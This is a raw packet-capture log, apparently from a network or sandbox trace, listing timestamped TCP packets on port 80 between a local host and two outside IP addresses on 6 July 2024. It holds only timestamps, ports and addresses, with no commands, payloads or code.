                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.180402994 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.180411100 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.180413008 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.180427074 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.180437088 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.180448055 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.180459976 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.180459976 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.180484056 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.180538893 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.180636883 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.180651903 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.180663109 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.180675983 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.180686951 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.180690050 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.180701017 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.180711031 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.180715084 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.180723906 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.180736065 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.180748940 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.181402922 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.181443930 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.181529045 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.181543112 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.181552887 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.181566000 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.181576967 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.181587934 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.181592941 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.181602955 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.181607962 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.181622028 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.181632042 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.181636095 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.181638956 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.181663036 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.181678057 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.181734085 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.181759119 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.181838989 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.181857109 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.181868076 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.181880951 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.181893110 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.181904078 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.181906939 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.181916952 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.181927919 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.181930065 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.181969881 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.181969881 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.182694912 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.182707071 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.182720900 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.182732105 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.182742119 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.182744980 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.182754040 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.182765961 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.182766914 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.182785988 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.182806969 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.182833910 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.182898998 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.182912111 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.182928085 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.182967901 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.183043003 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.183054924 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.183063030 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.183073997 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.183084965 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.183084965 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.183094978 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.183095932 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.183106899 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.183115005 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.183119059 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.183134079 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.183137894 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.183146000 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.183156967 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.183165073 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.183167934 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.183177948 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.183214903 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.184494972 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.184510946 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.184523106 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.184539080 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.184549093 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.184551001 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.184564114 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.184573889 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.184580088 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.184586048 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.184588909 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.184612036 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.184622049 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.184626102 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.184638977 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.184643984 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.184652090 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.184655905 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.184667110 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.184678078 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.184679985 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.184693098 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.184704065 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.184705019 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.184716940 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.184731960 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.184741020 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.184745073 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.184758902 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.184768915 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.184771061 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.184781075 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.184784889 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.184798956 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.184809923 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.184843063 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.185086012 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.185098886 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.185108900 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.185122967 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.185133934 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.185133934 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.185146093 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.185158968 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.185169935 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.185193062 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.185224056 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.185224056 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.192050934 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.319597960 CEST4974280192.168.2.464.31.40.18
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.324625015 CEST804974264.31.40.18192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.324723959 CEST4974280192.168.2.464.31.40.18
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.324762106 CEST4974280192.168.2.464.31.40.18
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.329627991 CEST804974264.31.40.18192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.847731113 CEST804974264.31.40.18192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.847767115 CEST804974264.31.40.18192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.848021030 CEST4974280192.168.2.464.31.40.18
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.848303080 CEST4974280192.168.2.464.31.40.18
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.848783970 CEST4974580192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.853924990 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.854029894 CEST4974580192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.854095936 CEST4974580192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.859041929 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.451699972 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.451745987 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.451762915 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.451801062 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.451812983 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.451824903 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.451837063 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.451838017 CEST4974580192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.451848030 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.451889038 CEST4974580192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.451889038 CEST4974580192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.451929092 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.451960087 CEST4974580192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.451982021 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.452389002 CEST4974580192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.456692934 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.456742048 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.456760883 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.457016945 CEST4974580192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.542804003 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.542817116 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.542823076 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.542880058 CEST4974580192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.542897940 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.542911053 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.542923927 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.542942047 CEST4974580192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.542979956 CEST4974580192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.543165922 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.543230057 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.543241978 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.543277979 CEST4974580192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.543340921 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.543353081 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.543390036 CEST4974580192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.543401957 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.543447971 CEST4974580192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.544171095 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.544215918 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.544229031 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.544266939 CEST4974580192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.544307947 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.544320107 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.544333935 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.544348001 CEST4974580192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.544384003 CEST4974580192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.545135975 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.545191050 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.545202971 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.545238972 CEST4974580192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.545264006 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.545277119 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.545317888 CEST4974580192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.547682047 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.547925949 CEST4974580192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.634042025 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.634110928 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.634121895 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.634156942 CEST4974580192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.634175062 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.634187937 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.634222031 CEST4974580192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.634291887 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.634303093 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.634314060 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.634325027 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.634337902 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.634341955 CEST4974580192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.634352922 CEST4974580192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.634388924 CEST4974580192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.634428024 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.634485006 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.634495974 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.634531975 CEST4974580192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.634633064 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.634644032 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.634654045 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.634666920 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.634684086 CEST4974580192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.634695053 CEST4974580192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.634820938 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.634829998 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.634840965 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.634852886 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.634865046 CEST4974580192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.634897947 CEST4974580192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.635334969 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.635375023 CEST4974580192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.635381937 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.635399103 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.635437965 CEST4974580192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.635523081 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.635536909 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.635548115 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.635588884 CEST4974580192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.635615110 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.635627031 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.635663033 CEST4974580192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.635699034 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.635710955 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.635721922 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.635747910 CEST4974580192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.635780096 CEST4974580192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.636301041 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.636354923 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.636374950 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.636385918 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.636401892 CEST4974580192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.636432886 CEST4974580192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.636501074 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.636512041 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.636529922 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.636559010 CEST4974580192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.636621952 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.636632919 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.636663914 CEST4974580192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.636723042 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.636734009 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.636773109 CEST4974580192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.637206078 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.637340069 CEST4974580192.168.2.4192.3.140.185
